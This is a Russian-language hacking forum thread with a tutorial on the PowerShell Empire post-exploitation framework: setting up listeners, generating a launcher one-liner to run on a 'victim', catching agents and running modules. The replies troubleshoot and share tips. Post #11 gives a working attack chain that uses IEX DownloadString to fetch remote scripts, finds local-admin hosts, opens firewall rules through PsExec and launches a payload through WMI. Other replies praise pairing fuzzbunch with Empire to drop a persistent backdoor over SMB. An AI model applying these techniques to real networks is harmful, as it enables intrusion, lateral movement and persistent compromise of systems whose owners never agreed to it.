Статья Знакомство с PowerShell Empire Framework

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
730
2 613
#1
И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)
Первым делом качаем:
Код:
git clone https://github.com/adaptivethreat/Empire.git
Запускаем
1.PNG

Смотрим help

2.PNG

Как и в любой клиент серверной программе сначала нам предстоит настроить listener(наш ip адрес и порт на котором мы будем встречать соединение с удаленной windows системы)
Идем в listener и смотрим командой options перечень параметров которые нам доступны для изменения:
3.PNG
Командой set Name можем задать имя нашему листенеру,аналогично можем указать порт и ip адрес.
Далее посмотрим какие есть векторы експлуатации клиенской части (stagers)
командой usestager и двойным нажатием клавиши tab
4.PNG
Как видите тут довольно таки большой выбор.Есть как dll injection,hta,Rubber Ducker,макросы и т.д.
Ну для ознакомления мы используем стейжер launcher - который создаст нам однострочную команду для powerhsell которую нужно будет запустить на стороне жертвы.

5.PNG
Вводим команды
Код:
usestager launcher
set Listener DarkNode
execute
Надеюсь понятно что usestager launcher - говорим какой стейжер будет юзать.
set Listener указываем на каком листенере будем встречать коннект.
execute - сгенерировать команду
На вывод получаем нашу команду: 6.PNG

Дальше запускаем эту команду на стороне жертвы и ловим соединение (В отличии от метасплоита там сессии называют в большинстве случаев метерпретер сессии ,а в импери (Empire) агентами)
И вот к нам прилетает агент)
7.PNG 8.PNG
Командой list agents - посмотреть список агентов
rename - можно переименовать имя агента(так по дефолту оно рандомное) - это не обизательно,больше для удобства просто.
interact - мигрировать в сессию агента (аналогично как session -i в метасплоите)

Дальше у нас открывается очень много функционала,изучаем команду help:
9.PNG

И еще перечень модулей можно посмотреть командой
usemodule "и нажать клавишу таб [tab]"
10.PNG

Так для примера возьмем модуль тролинга и выведем сообщение об ошибке с нужным нам текстом на стороне жертвы
11.PNG 12.PNG

При просмотре видео можете включить субтитры.
Всем спасибо)) Продолжения следует) Хех)
 
Последнее редактирование:

Inject0r

Well-known member
03.09.2016
114
173
#2
Супер! Интересно про атаку на DC с помощью этой утилиты почитать)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
730
2 613
#3
Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Для просмотра контента необходимо: Войти или зарегистрироваться

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)
 

useralexrc

Active member
12.11.2016
26
7
#5
(Empire: listeners) > execute
[!] Error starting listener on port 8080: [Errno 98] Address already in use
[!] Error starting listener on port 8080, port likely already in use.
В чем может быть причина?
 

Mr.Gor

New member
24.10.2016
2
2
#7
Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Для просмотра контента необходимо: Войти или зарегистрироваться

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)
Спасибо за статью!
Заинтересовал таском BlueBox Pentest. Буду ждать статейку.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
730
2 613
#8
Уже разобрался, спасибо за статью)
Два раза команду execute наверное выполнил)
И он поругался на то что порт занят уже)
Можно создавать много листенеров просто нужно указывать им разные порты командой set Port
И разные имена им давать.

Так же можно выбрать тип листенера командой set Type (по умолчанию native) и к примеру создать листенер для метасплоиа и легко мигрировать с империи в метасплоит если нужно выполнить там какойто модуль или какой то функционал.
Если нужно подробнее о миграции в метасплоит - я могу написать пост как это делать.Там все easy(легко).
 
Симпатии: Понравилось gu3st

viktorcruce

Active member
19.12.2016
29
3
#11
Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск
Для просмотра контента необходимо: Войти или зарегистрироваться

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)
если не трудно бро то можно в пм саму технику. я видел как автор нишанга делал эту атаку незнаю насколько она сейчас актуальна)

Собрал для своих нужд вот такой комбаин...

[HIDE="35"]IEX (New-Object Net.WebClient).DownloadString('
Для просмотра контента необходимо: Войти или зарегистрироваться
IEX (New-Object Net.WebClient).DownloadString('
Для просмотра контента необходимо: Войти или зарегистрироваться
Invoke-FindLocalAdminAccess -Threads 40 | foreach { "Name : "+$_;Invoke-PsExec -Command 'netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes' -ComputerName $_ ; Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "your payload" -Computername $_ }
 

Dmitry88

Премиум
29.12.2016
117
135
#12
Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
730
2 613
#13
Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?
Я приветствую, если указан источник на ресурс.
 

hdmoor

Active member
22.11.2016
31
5
#14
Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
730
2 613
#15
Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.
Сделай скриншот проблемы,попытаюсь помочь.
 

hdmoor

Active member
22.11.2016
31
5
#16
Screenshot from 2017-05-20 04-34-54.png

Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет?
Для просмотра контента необходимо: Войти или зарегистрироваться
 

Ondrik8

prodigy
Red Team
08.11.2016
914
2 438
#17
Посмотреть вложение 10156

Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет?
Для просмотра контента необходимо: Войти или зарегистрироваться
Командой set нужно менять параметр стажер или листенер

смотри внемательно!! у меня все получилось он работает только не пытайся параметр http в листенере поменять!
 

Dmitry88

Премиум
29.12.2016
117
135
#19

Ondrik8

prodigy
Red Team
08.11.2016
914
2 438
#20
Сегодня вышла
Для просмотра контента необходимо: Войти или зарегистрироваться
! и там много вкусного!)))

Код:
-Add get schwifty trollsploit module @424f424f
-Add -sta flag to launcher @xorrior
-Fixed hardoced cert path @xorrior
-Fix for #567
-Merge Capture OSX credentials from Prompt Module in Empire DB @malcomvetter.
-Rest Api fixups #526 @byt3bl33d3r
-Added MS16-135 exploit module @ThePirateWhoSmellsOfSunflowers
-Updated Bloodhound Ingestion module @rvrsh3ll
-Added Dropbox exfil module @ktevora1
-Added EternalBlue module @ktevora1
-Fix SSL certificate issue with Flask @diskonnect
-Modify staging to handle unicode characters @killswitch-GUI
-Add wmi_updater module #509 @tristandostaler
-Add DropBox exfil module #557 @e0x70i
-Fix Unexpected error: <class 'struct.error'> run empire #567
-Fix SSL Intermediate Certificates to support Domain Fronting #569 @dchrastil
-Add ‘SandboxMode’ to evade Apple Sandbox protection on applescript #578 @dchrastil
-Add Obfuscated Empire #597 @cobbr
-Add Bypass ScriptBlock Logging #603 @cobbr
-Add mimipenguin module @rvrsh3ll
-Add dyld_print_to_file Mac privesc @checkyfuntime
-Added manual proxy specifications @xorrior
-Fix libssl-dev and libssl1.0.0 packages @xorrior
-Add backgrounding for downloads in PowerShell agent @xorrior
-Fix warning patch in http listener @viss
-Update Invoke-Kerberoast @424f424f
-Tab complete shows elevated modules: #599
- Additional bypassUAC modules added: #596
- Added show uac level module #609
- Fixed shebangs: #640
 
Последнее редактирование: